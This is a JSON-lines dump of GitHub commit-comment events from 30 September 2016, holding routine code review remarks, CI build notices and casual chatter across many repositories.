{"id":"4642930794","type":"CommitCommentEvent","actor":{"login":"Mr-MEX"},"repo":{"name":"Loller79/Solid_Kernel-G3-STOCK-MM"},"payload":{"comment":{"id":19239692,"position":null,"line":null,"path":null,"commit_id":"6ebb172ff2c4f7ec441a3cc6b414795f8c45f8a0","created_at":"2016-09-30T11:36:39Z","updated_at":"2016-09-30T11:36:39Z","body":"Hey, give me the link of the original commit"}},"created_at":"2016-09-30T11:36:39Z"}
{"id":"4642936507","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19239707,"position":13,"line":13,"path":"ALGORYTHMS/sort_files/debug.h","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T11:38:09Z","updated_at":"2016-09-30T11:38:09Z","body":"ИМХО\r\n```std::cout << (debug_flag ? \"DEBUG ON\" : \"DEBUG OFF\") << std::endl;```"}},"created_at":"2016-09-30T11:38:09Z"}
{"id":"4642939159","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239716,"position":25,"line":25,"path":"task4.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:38:50Z","updated_at":"2016-09-30T11:38:50Z","body":"there is `enumerate` function in python which you might use in such situations.\r\n`for i, letter in enumerate(word):\r\n    if letter == char\r\n`"}},"created_at":"2016-09-30T11:38:50Z"}
{"id":"4642944490","type":"CommitCommentEvent","actor":{"login":"Ostico"},"repo":{"name":"matecat/MateCat"},"payload":{"comment":{"id":19239723,"position":4,"line":181,"path":"lib/Controller/getContributionController.php","commit_id":"a47bc8ec31aaf91a6ca32c9008ed10dc5ddcde89","created_at":"2016-09-30T11:40:13Z","updated_at":"2016-09-30T11:40:13Z","body":"Get from metadata"}},"created_at":"2016-09-30T11:40:13Z"}
{"id":"4642947955","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":19239732,"position":12,"line":12,"path":"ALGORYTHMS/sort_files/files.cpp","commit_id":"a272cdb01362da9ed22e12a9979782176fc2fab3","created_at":"2016-09-30T11:41:06Z","updated_at":"2016-09-30T11:41:06Z","body":"ИМХО\r\nВместо `dir && closedir(dir);` лучше `if (dir) close(dir);` – читается привычнее и не зависит от возможной перегруженности оператора `&&`."}},"created_at":"2016-09-30T11:41:06Z"}
{"id":"4642949637","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239736,"position":31,"line":31,"path":"task4.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:41:32Z","updated_at":"2016-09-30T11:41:32Z","body":"please don't use global variables.\r\n\r\nWrap all global code in function.\r\n\r\nPlease take a look:\r\nhttps://docs.python.org/3/library/__main__.html"}},"created_at":"2016-09-30T11:41:32Z"}
{"id":"4642951977","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239741,"position":32,"line":32,"path":"task4.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:42:07Z","updated_at":"2016-09-30T11:42:07Z","body":"It's not fair game if user knows answer beforehand :) Please delete this line"}},"created_at":"2016-09-30T11:42:07Z"}
{"id":"4642953380","type":"CommitCommentEvent","actor":{"login":"sambrightman"},"repo":{"name":"hartwigmedical/pipeline"},"payload":{"comment":{"id":19239744,"position":null,"line":null,"path":null,"commit_id":"078ee75cedd8219a6baa2d21db3491704388c735","created_at":"2016-09-30T11:42:29Z","updated_at":"2016-09-30T11:42:29Z","body":"Whoops. Good catch."}},"created_at":"2016-09-30T11:42:29Z"}
{"id":"4642956035","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"agaluzo/lesson2"},"payload":{"comment":{"id":19239748,"position":33,"line":33,"path":"task4.py","commit_id":"15c538a15a5b5deb3bb35471de1ada29dd64bcc2","created_at":"2016-09-30T11:43:10Z","updated_at":"2016-09-30T11:43:10Z","body":"I would prefer `'_' * len(hidden_word)`"}},"created_at":"2016-09-30T11:43:10Z"}
{"id":"4642960092","type":"CommitCommentEvent","actor":{"login":"ohsOllila"},"repo":{"name":"NMRLipids/lipid_ionINTERACTION"},"payload":{"comment":{"id":19239752,"position":null,"line":null,"path":null,"commit_id":"ed9f3055fa4d3983c2b45926214f2cae4f9b5bd5","created_at":"2016-09-30T11:44:11Z","updated_at":"2016-09-30T11:44:11Z","body":"What are the stars in the end of some labels in NaDensities_withSnap.pdf?"}},"created_at":"2016-09-30T11:44:11Z"}
{"id":"4642963000","type":"CommitCommentEvent","actor":{"login":"fervilber"},"repo":{"name":"fervilber/test-repo"},"payload":{"comment":{"id":19239760,"position":null,"line":null,"path":null,"commit_id":"67ad070428d422f292c7d57b3bc909dcd84f9265","created_at":"2016-09-30T11:44:58Z","updated_at":"2016-09-30T11:44:58Z","body":"aceptado"}},"created_at":"2016-09-30T11:44:58Z"}
{"id":"4642963433","type":"CommitCommentEvent","actor":{"login":"danielbdrpg"},"repo":{"name":"bcit-ci/CodeIgniter"},"payload":{"comment":{"id":19239762,"position":null,"line":null,"path":null,"commit_id":"083e3c8d39a4fb9f8ef37f61f0ea42ec3fe1389f","created_at":"2016-09-30T11:45:05Z","updated_at":"2016-09-30T11:45:05Z","body":"How do I use it? The same way to use insert_batch() in others Databases?"}},"created_at":"2016-09-30T11:45:05Z"}
{"id":"4642963813","type":"CommitCommentEvent","actor":{"login":"smararu"},"repo":{"name":"smararu/ThirdYearProject"},"payload":{"comment":{"id":19239764,"position":null,"line":null,"path":null,"commit_id":"caa6ebab9b41123b95dc99e31fa6057cfc1c020c","created_at":"2016-09-30T11:45:12Z","updated_at":"2016-09-30T11:45:12Z","body":"Was so tired I misspelled the name, also, add in a refactoring period, and produce a print friendly version"}},"created_at":"2016-09-30T11:45:12Z"}
{"id":"4642967938","type":"CommitCommentEvent","actor":{"login":"ThinkGraphical"},"repo":{"name":"anomalylabs/posts-module"},"payload":{"comment":{"id":19239771,"position":null,"line":null,"path":null,"commit_id":"24304d219f8298f946f3e50bf80fd8f32eac6dc8","created_at":"2016-09-30T11:46:17Z","updated_at":"2016-09-30T11:46:17Z","body":"When creating a new post 'type' the default value in the post layout is still `{{ post.content|raw }}`\r\nmaybe change this to '{{ post.content.render|raw }}' too !?"}},"created_at":"2016-09-30T11:46:17Z"}
{"id":"4642968555","type":"CommitCommentEvent","actor":{"login":"theknight1509"},"repo":{"name":"theknight1509/FYS4150_Project2"},"payload":{"comment":{"id":19239774,"position":null,"line":null,"path":null,"commit_id":"46595da3eef2eee3a7777a20a4ea53e965ea2d1a","created_at":"2016-09-30T11:46:26Z","updated_at":"2016-09-30T11:46:26Z","body":"Merge branch 'python' with branch 'master'"}},"created_at":"2016-09-30T11:46:26Z"}
{"id":"4642968670","type":"CommitCommentEvent","actor":{"login":"imcaffrey"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19239775,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-30T11:46:28Z","updated_at":"2016-09-30T11:46:28Z","body":"静静终于变成了劲劲hhhhh"}},"created_at":"2016-09-30T11:46:28Z"}
{"id":"4642969079","type":"CommitCommentEvent","actor":{"login":"thgaskell"},"repo":{"name":"sogalutira/styles-for-hue"},"payload":{"comment":{"id":19239776,"position":null,"line":null,"path":null,"commit_id":"1e92c615d6480163f4ad0d9d072ef303d4e8cd5f","created_at":"2016-09-30T11:46:36Z","updated_at":"2016-09-30T11:46:36Z","body":"Oh no, incoming merge conflict 😅 "}},"created_at":"2016-09-30T11:46:36Z"}
{"id":"4642976261","type":"CommitCommentEvent","actor":{"login":"markussmiettinen"},"repo":{"name":"NMRLipids/lipid_ionINTERACTION"},"payload":{"comment":{"id":19239797,"position":null,"line":null,"path":null,"commit_id":"ed9f3055fa4d3983c2b45926214f2cae4f9b5bd5","created_at":"2016-09-30T11:48:23Z","updated_at":"2016-09-30T11:48:23Z","body":"DPPCs. There is an explaining box, but probably could write this in the caption, too."}},"created_at":"2016-09-30T11:48:23Z"}
{"id":"4642977485","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19239801,"position":6,"line":9,"path":"src/mods/text.js","commit_id":"472dac00e7de211e17770f2199a8a072ff79b05e","created_at":"2016-09-30T11:48:42Z","updated_at":"2016-09-30T11:48:42Z","body":"no todos in the code please"}},"created_at":"2016-09-30T11:48:42Z"}
{"id":"4642979018","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19239804,"position":2,"line":6,"path":"src/mods/text.js","commit_id":"472dac00e7de211e17770f2199a8a072ff79b05e","created_at":"2016-09-30T11:49:06Z","updated_at":"2016-09-30T11:49:06Z","body":"not required - it's in a developer branch, so it being worked on is expected :)"}},"created_at":"2016-09-30T11:49:06Z"}
{"id":"4642980198","type":"CommitCommentEvent","actor":{"login":"Too-Naive"},"repo":{"name":"racaljk/hosts"},"payload":{"comment":{"id":19239808,"position":null,"line":null,"path":null,"commit_id":"026d52fab9728f311b8edabaf8a4b598d207f5a7","created_at":"2016-09-30T11:49:23Z","updated_at":"2016-09-30T11:49:23Z","body":"![](https://cloud.githubusercontent.com/assets/16496671/17828062/95155038-66ba-11e6-83c3-d2edd5bbcec5.gif)"}},"created_at":"2016-09-30T11:49:23Z"}
{"id":"4642983032","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19239815,"position":17,"line":20,"path":"src/mods/text.js","commit_id":"472dac00e7de211e17770f2199a8a072ff79b05e","created_at":"2016-09-30T11:50:04Z","updated_at":"2016-09-30T11:50:04Z","body":"you might want to redo the keys, something like [topic].[subtopic] is easier to use ;) have a look at the ones you took from the getMsg-method."}},"created_at":"2016-09-30T11:50:04Z"}
{"id":"4642985836","type":"CommitCommentEvent","actor":{"login":"PhenomRetroShare"},"repo":{"name":"RetroShare/RetroShare"},"payload":{"comment":{"id":19239825,"position":null,"line":null,"path":null,"commit_id":"84341f26b38d3848f29e81eaf5830400bf29c31e","created_at":"2016-09-30T11:50:46Z","updated_at":"2016-09-30T11:50:46Z","body":"@csoler: You broke one more time indents. Please active show white-space and respect file indent. Even if @sehraf say you to respect the coding style: https://github.com/RetroShare/RetroShare/wiki/Coding#coding-style.\r\n;)"}},"created_at":"2016-09-30T11:50:46Z"}
{"id":"4642988957","type":"CommitCommentEvent","actor":{"login":"misagolban"},"repo":{"name":"misagolban/hello-world"},"payload":{"comment":{"id":19239835,"position":4,"line":4,"path":"README.md","commit_id":"3081b730f3bf2f87dfa005cdaee493446624411d","created_at":"2016-09-30T11:51:36Z","updated_at":"2016-09-30T11:51:36Z","body":"setg"}},"created_at":"2016-09-30T11:51:36Z"}
{"id":"4642989581","type":"CommitCommentEvent","actor":{"login":"Ardenian"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19239836,"position":17,"line":20,"path":"src/mods/text.js","commit_id":"472dac00e7de211e17770f2199a8a072ff79b05e","created_at":"2016-09-30T11:51:44Z","updated_at":"2016-09-30T11:51:44Z","body":"Great idea, saw it in getMsg, as with user.unknown or login.fail, gooing to change it"}},"created_at":"2016-09-30T11:51:44Z"}
{"id":"4642990735","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19239837,"position":4,"line":4,"path":"src/mods/text.js","commit_id":"5d0b78ae3181a79fbdccf8fc2f7d489904438c6c","created_at":"2016-09-30T11:52:01Z","updated_at":"2016-09-30T11:52:01Z","body":"this should be a seperate object directly beneath idrinth.text - easier to fill with outside data later on."}},"created_at":"2016-09-30T11:52:01Z"}
{"id":"4642991655","type":"CommitCommentEvent","actor":{"login":"ohsOllila"},"repo":{"name":"NMRLipids/lipid_ionINTERACTION"},"payload":{"comment":{"id":19239838,"position":null,"line":null,"path":null,"commit_id":"ed9f3055fa4d3983c2b45926214f2cae4f9b5bd5","created_at":"2016-09-30T11:52:14Z","updated_at":"2016-09-30T11:52:14Z","body":"I think the box is enough. It is just too difficult to find now. I think moving to the left, just under the first stars, under 150mM Berger OPLS might be good."}},"created_at":"2016-09-30T11:52:14Z"}
{"id":"4642992548","type":"CommitCommentEvent","actor":{"login":"Idrinth"},"repo":{"name":"Idrinth/IDotD"},"payload":{"comment":{"id":19239839,"position":36,"line":36,"path":"src/mods/text.js","commit_id":"5d0b78ae3181a79fbdccf8fc2f7d489904438c6c","created_at":"2016-09-30T11:52:27Z","updated_at":"2016-09-30T11:52:27Z","body":"checking if it's not undefined might be sufficient here"}},"created_at":"2016-09-30T11:52:27Z"}
{"id":"4642993883","type":"CommitCommentEvent","actor":{"login":"legal90"},"repo":{"name":"johnbellone/vault-cookbook"},"payload":{"comment":{"id":19239842,"position":75,"line":75,"path":".kitchen.dokken.yml","commit_id":"2b199d564a40c3881e5557bec328e00b438671cb","created_at":"2016-09-30T11:52:47Z","updated_at":"2016-09-30T11:52:47Z","body":"@johnbellone This policyfile doesn't exist in the repo"}},"created_at":"2016-09-30T11:52:47Z"}
{"id":"4643003618","type":"CommitCommentEvent","actor":{"login":"MAK-STUDIO"},"repo":{"name":"MAK-STUDIO/UFO-Circles"},"payload":{"comment":{"id":19239864,"position":null,"line":null,"path":null,"commit_id":"0adfd3258b4ce48a165b9d44b08762a8ebe28adf","created_at":"2016-09-30T11:55:12Z","updated_at":"2016-09-30T11:55:12Z","body":"corrected speed of movement"}},"created_at":"2016-09-30T11:55:12Z"}
{"id":"4643005895","type":"CommitCommentEvent","actor":{"login":"eviljeff"},"repo":{"name":"mozilla/addons-server"},"payload":{"comment":{"id":19239870,"position":24,"line":28,"path":"src/olympia/amo/management/commands/fix_licenses.py","commit_id":"e6752af8aa66d3259a3d698e0f2dc63cb252e094","created_at":"2016-09-30T11:55:45Z","updated_at":"2016-09-30T11:55:45Z","body":"I don't really understand what you're doing here.  `1` isn't right?"}},"created_at":"2016-09-30T11:55:45Z"}
{"id":"4643006988","type":"CommitCommentEvent","actor":{"login":"cheh"},"repo":{"name":"CherryFramework/cherry-framework"},"payload":{"comment":{"id":19239871,"position":143,"line":143,"path":"modules/cherry-template-manager/inc/cherry-template-loader.php","commit_id":"6b79035d0fe87821dd1e4f985c95840d0e0a8fc0","created_at":"2016-09-30T11:56:01Z","updated_at":"2016-09-30T11:56:01Z","body":"`WP_CONTENT_DIR . '/plugins/'` -- https://codex.wordpress.org/Determining_Plugin_and_Content_Directories#Constants"}},"created_at":"2016-09-30T11:56:01Z"}
{"id":"4643012764","type":"CommitCommentEvent","actor":{"login":"tsauerwein"},"repo":{"name":"c2corg/v6_common"},"payload":{"comment":{"id":19239875,"position":11,"line":23,"path":"c2corg_common/associations.py","commit_id":"a59e9583b2801103515a8aaab97d15a263633f62","created_at":"2016-09-30T11:57:25Z","updated_at":"2016-09-30T11:57:25Z","body":"You are missing: `(ARTICLE_TYPE, IMAGE_TYPE)`\r\n\r\nSee https://github.com/c2corg/camptocamp.org/blob/master/data/sql/tables/db_associations.sql#L70"}},"created_at":"2016-09-30T11:57:25Z"}
{"id":"4643016142","type":"CommitCommentEvent","actor":{"login":"chusiang"},"repo":{"name":"commandp/zabbix-agent"},"payload":{"comment":{"id":19239881,"position":null,"line":null,"path":null,"commit_id":"e41f6aad66922f656f0849d33d227a122625a8ef","created_at":"2016-09-30T11:58:15Z","updated_at":"2016-09-30T11:58:15Z","body":"Refs.\r\n\r\n- [Creating a Base Box - Vagrant by HashiCorp](https://www.vagrantup.com/docs/boxes/base.html)\r\n- [Create A Vagrant Windows Base Box | Smalltown Tech Blog](https://smalltowntechblog.com/2015/03/12/create-a-vagrant-windows-base-box/)\r\n- [How do I retrieve the public key from a SSH private key? - Ask Ubuntu](http://askubuntu.com/questions/53553/how-do-i-retrieve-the-public-key-from-a-ssh-private-key)"}},"created_at":"2016-09-30T11:58:15Z"}
{"id":"4643016864","type":"CommitCommentEvent","actor":{"login":"mingxuWang"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19239883,"position":144,"line":144,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T11:58:25Z","updated_at":"2016-09-30T11:58:25Z","body":"如果你要这么用的话，前面已经对couponData设置了异常处理，如果没有就会是一个空数组[]，那么pn直接取couponDataLen的值就可以了，没有三元判断的必要。"}},"created_at":"2016-09-30T11:58:25Z"}
{"id":"4643021701","type":"CommitCommentEvent","actor":{"login":"tsufz"},"repo":{"name":"MassBank/Bio-MassBank"},"payload":{"comment":{"id":19239900,"position":null,"line":null,"path":null,"commit_id":"5f4ee772dc359c39c41bd37b0ad9ba283f027d1a","created_at":"2016-09-30T11:59:35Z","updated_at":"2016-09-30T11:59:35Z","body":"updated Readme"}},"created_at":"2016-09-30T11:59:35Z"}
{"id":"4643022923","type":"CommitCommentEvent","actor":{"login":"Nyameri"},"repo":{"name":"Nyameri/widowschat"},"payload":{"comment":{"id":19239902,"position":null,"line":null,"path":null,"commit_id":"4a23d4a425decc52a5be282bebf8eb920b1f7f57","created_at":"2016-09-30T11:59:54Z","updated_at":"2016-09-30T11:59:54Z","body":"Nyameri-patch-1"}},"created_at":"2016-09-30T11:59:54Z"}
{"id":"4643023025","type":"CommitCommentEvent","actor":{"login":"sehraf"},"repo":{"name":"RetroShare/RetroShare"},"payload":{"comment":{"id":19239903,"position":null,"line":null,"path":null,"commit_id":"84341f26b38d3848f29e81eaf5830400bf29c31e","created_at":"2016-09-30T11:59:56Z","updated_at":"2016-09-30T11:59:56Z","body":"The coding style was choosen to fit cyril's needs (AFAIK it was vim's needs) 😉 \r\nSo yes @csoler please stick to it"}},"created_at":"2016-09-30T11:59:56Z"}
{"id":"4643024462","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19239904,"position":null,"line":null,"path":null,"commit_id":"8347c0bc91edaada78500f2787e057a7f69256dd","created_at":"2016-09-30T12:00:16Z","updated_at":"2016-09-30T12:00:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 68](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14686&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) is now running\n"}},"created_at":"2016-09-30T12:00:16Z"}
{"id":"4643026507","type":"CommitCommentEvent","actor":{"login":"kirandboss82"},"repo":{"name":"kirandboss82/test"},"payload":{"comment":{"id":19239909,"position":null,"line":null,"path":null,"commit_id":"997081d96f6bcf7bda22262bed7dc28631c15502","created_at":"2016-09-30T12:00:44Z","updated_at":"2016-09-30T12:00:44Z","body":"added purpose in this file"}},"created_at":"2016-09-30T12:00:44Z"}
{"id":"4643028943","type":"CommitCommentEvent","actor":{"login":"adrienpeiffer"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19239916,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T12:01:22Z","updated_at":"2016-09-30T12:01:22Z","body":"Great ! Congratulations :smile: "}},"created_at":"2016-09-30T12:01:22Z"}
{"id":"4643029816","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19239918,"position":null,"line":null,"path":null,"commit_id":"8347c0bc91edaada78500f2787e057a7f69256dd","created_at":"2016-09-30T12:01:37Z","updated_at":"2016-09-30T12:01:37Z","body":"TeamCity OTA+ :: rvi_sota_server :: migrations container [Build 68](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14686&buildTypeId=ota_plus_RviSotaServer_MigrationsContainer) outcome was **SUCCESS**\nSummary: Running Build time: 00:01:21"}},"created_at":"2016-09-30T12:01:37Z"}
{"id":"4643031168","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19239920,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-30T12:01:59Z","updated_at":"2016-09-30T12:01:59Z","body":"I can flash this afternoon after work and get a recovery log no problem. I haven't been able to get a kmsg, though. ADB says it doesn't exist and/or creates a file that is 0kb in size. I do see a last_kmsg but I'm not sure it's from booting N, it may be from the last boot of MM."}},"created_at":"2016-09-30T12:01:59Z"}
{"id":"4643032676","type":"CommitCommentEvent","actor":{"login":"kardishcj"},"repo":{"name":"kardishcj/pair_repo"},"payload":{"comment":{"id":19239927,"position":null,"line":null,"path":null,"commit_id":"f3beaed17ef972f09a2618c16dec93942085f45b","created_at":"2016-09-30T12:02:23Z","updated_at":"2016-09-30T12:02:23Z","body":"Did it work?"}},"created_at":"2016-09-30T12:02:23Z"}
{"id":"4643033614","type":"CommitCommentEvent","actor":{"login":"jfportalb"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19239930,"position":22,"line":29,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-30T12:02:36Z","updated_at":"2016-09-30T12:02:36Z","body":"Isso aconteceu porque você colocou o tipo no XMI dentro do método start. Então a variável global não muda, ficando null, por isso o erro. Falei sobre isso em outro comentário."}},"created_at":"2016-09-30T12:02:36Z"}
{"id":"4643053064","type":"CommitCommentEvent","actor":{"login":"julien-innovantic"},"repo":{"name":"GSOinteractive/react-native-firestack"},"payload":{"comment":{"id":19239967,"position":5,"line":22,"path":"ios/Firestack/FirestackAuth.m","commit_id":"ae40fecfffc4a760a94e9ba3cd84599bf54676db","created_at":"2016-09-30T12:07:26Z","updated_at":"2016-09-30T12:07:26Z","body":"like in https://github.com/GSOinteractive/react-native-firestack/commit/863432600e2a745db5f9c6e08ffac3e6737345f6 ?"}},"created_at":"2016-09-30T12:07:26Z"}
{"id":"4643053494","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19239969,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-30T12:07:33Z","updated_at":"2016-09-30T12:07:33Z","body":"I should add when I flash N the result is a successful flash. The only thing I see on the screen during flash is SU fails to install. The message says it failed to decompress ramdisk and it aborts at that point. I do not believe the issue is related to SU as I have removed it from the zip before flash, then flashed successfully, and still ending up freezing at the Sammy logo."}},"created_at":"2016-09-30T12:07:33Z"}
{"id":"4643054872","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19239974,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-30T12:07:54Z","updated_at":"2016-09-30T12:07:54Z","body":"it's still not a host. that's a domain pointing to a container ;)"}},"created_at":"2016-09-30T12:07:54Z"}
{"id":"4643059011","type":"CommitCommentEvent","actor":{"login":"tonyli508"},"repo":{"name":"tonyli508/AlamofireDomain"},"payload":{"comment":{"id":19239980,"position":null,"line":null,"path":null,"commit_id":"6da492bd06b36d0738fa46edd6537249ae9b41e2","created_at":"2016-09-30T12:08:55Z","updated_at":"2016-09-30T12:08:55Z","body":"That's what I do at moment, as soon as it's needed and also depends on how many using it."}},"created_at":"2016-09-30T12:08:55Z"}
{"id":"4643060926","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/codyco-modules"},"payload":{"comment":{"id":19239982,"position":null,"line":null,"path":null,"commit_id":"f55b974b95514a0136bdc694a431ee351995f0db","created_at":"2016-09-30T12:09:24Z","updated_at":"2016-09-30T12:09:24Z","body":"@DanielePucci you forgot to commit the directory"}},"created_at":"2016-09-30T12:09:24Z"}
{"id":"4643062635","type":"CommitCommentEvent","actor":{"login":"EnTeQuAk"},"repo":{"name":"mozilla/addons-server"},"payload":{"comment":{"id":19239984,"position":24,"line":28,"path":"src/olympia/amo/management/commands/fix_licenses.py","commit_id":"e6752af8aa66d3259a3d698e0f2dc63cb252e094","created_at":"2016-09-30T12:09:49Z","updated_at":"2016-09-30T12:09:49Z","body":"No, I just noticed that `builtin` refers to a id that is manually being set in the admin for all builtin licenses. Since I don't know the free ids I calculate one that fits and isn't being used."}},"created_at":"2016-09-30T12:09:49Z"}
{"id":"4643063692","type":"CommitCommentEvent","actor":{"login":"SajithPradeep"},"repo":{"name":"abhisheksett/FEDashboard"},"payload":{"comment":{"id":19239989,"position":null,"line":null,"path":null,"commit_id":"73fa0a5807b89ea6625b9fc6733b91f38adb5ac1","created_at":"2016-09-30T12:10:05Z","updated_at":"2016-09-30T12:10:05Z","body":"Just the initial dashboard layout boilerplate."}},"created_at":"2016-09-30T12:10:05Z"}
{"id":"4643068105","type":"CommitCommentEvent","actor":{"login":"lucasfcosta"},"repo":{"name":"lucasfcosta/dotfiles"},"payload":{"comment":{"id":19239996,"position":null,"line":null,"path":null,"commit_id":"348511618c80c897b102a775816f7e78bbdf229b","created_at":"2016-09-30T12:11:06Z","updated_at":"2016-09-30T12:11:06Z","body":"I was tweaking some configs and this ended up happening somehow.\r\nCrazy stuff"}},"created_at":"2016-09-30T12:11:06Z"}
{"id":"4643072673","type":"CommitCommentEvent","actor":{"login":"FernBch"},"repo":{"name":"AOSP-JF-MM/platform_device_samsung_jflte"},"payload":{"comment":{"id":19240004,"position":null,"line":null,"path":null,"commit_id":"ca517c1d5e053cde679ad6f2f72f1623f4f8191e","created_at":"2016-09-30T12:12:12Z","updated_at":"2016-09-30T12:12:12Z","body":"One more detail. ADB does not reconnect to my I545 when booting N no matter how long I wait. If I do the same procedure with MM ADB reconnects as soon as the Sammy logo disappears and the led starts flashing.\r\n\r\nI know it's not much to go on as there is no kmsg but it's as far as I have been able to get."}},"created_at":"2016-09-30T12:12:12Z"}
{"id":"4643078445","type":"CommitCommentEvent","actor":{"login":"deasung"},"repo":{"name":"deasung/it-flame-coding-community"},"payload":{"comment":{"id":19240014,"position":null,"line":null,"path":null,"commit_id":"98bc67d9dfe261fcb8eb9efe2b8df74368d72751","created_at":"2016-09-30T12:13:39Z","updated_at":"2016-09-30T12:13:39Z","body":"너왜수덩헤ㅛㅛㅓ"}},"created_at":"2016-09-30T12:13:39Z"}
{"id":"4643082842","type":"CommitCommentEvent","actor":{"login":"timwis"},"repo":{"name":"CodeForPhilly/stately"},"payload":{"comment":{"id":19240021,"position":6,"line":361,"path":"server/src/stately/models.py","commit_id":"7166f6d9a6f6ebca4d24ffc5b7119c1a8bc52949","created_at":"2016-09-30T12:14:42Z","updated_at":"2016-09-30T12:14:42Z","body":"FYI @mjumbewu "}},"created_at":"2016-09-30T12:14:42Z"}
{"id":"4643084725","type":"CommitCommentEvent","actor":{"login":"feelobot"},"repo":{"name":"Vungle/docker-golang"},"payload":{"comment":{"id":19240028,"position":null,"line":null,"path":null,"commit_id":"23a35754edfdafec903882ce0f35cdceb18d8aac","created_at":"2016-09-30T12:15:10Z","updated_at":"2016-09-30T12:15:10Z","body":"You removed everything that allows CircleCI builds to work..."}},"created_at":"2016-09-30T12:15:10Z"}
{"id":"4643086300","type":"CommitCommentEvent","actor":{"login":"gustavovalverde"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19240034,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T12:15:32Z","updated_at":"2016-09-30T12:15:32Z","body":"A new era begins! 😄 "}},"created_at":"2016-09-30T12:15:32Z"}
{"id":"4643086972","type":"CommitCommentEvent","actor":{"login":"NicolasGrosjean"},"repo":{"name":"loup99/WtWSMS"},"payload":{"comment":{"id":19240035,"position":null,"line":null,"path":null,"commit_id":"dd038562dfdfd2f4b3a44a3e8e2232c064b51540","created_at":"2016-09-30T12:15:43Z","updated_at":"2016-09-30T12:15:43Z","body":"I didn't know this word.\r\nLike you have change an \"heresey\" into \"heresy\", if we revert this commit we will create a bug.\r\nSo I have done a new commit (65d3f3d) to put \"heresey\" everywhere.\r\nIf in fact the good word was \"heresy\", there is one single commit to revert."}},"created_at":"2016-09-30T12:15:43Z"}
{"id":"4643088849","type":"CommitCommentEvent","actor":{"login":"darkslake"},"repo":{"name":"darkslake/PS4-4.00-fix-exploit-by-darkslake-"},"payload":{"comment":{"id":19240041,"position":null,"line":null,"path":null,"commit_id":"18c259384af8d92072f01a356e66fd18e7406c3e","created_at":"2016-09-30T12:16:13Z","updated_at":"2016-09-30T12:16:13Z","body":"+# PS4-4.00-fix-exploit-by-darkslake- "}},"created_at":"2016-09-30T12:16:13Z"}
{"id":"4643093703","type":"CommitCommentEvent","actor":{"login":"furzeface"},"repo":{"name":"fephil/frontendphil.com-v1"},"payload":{"comment":{"id":19240046,"position":3,"line":2,"path":"src/pages/index.hbs","commit_id":"d2058b58c7a650d495e007ac87a68e97a637bfa1","created_at":"2016-09-30T12:17:15Z","updated_at":"2016-09-30T12:17:15Z","body":"LOL WordPress :octocat: "}},"created_at":"2016-09-30T12:17:15Z"}
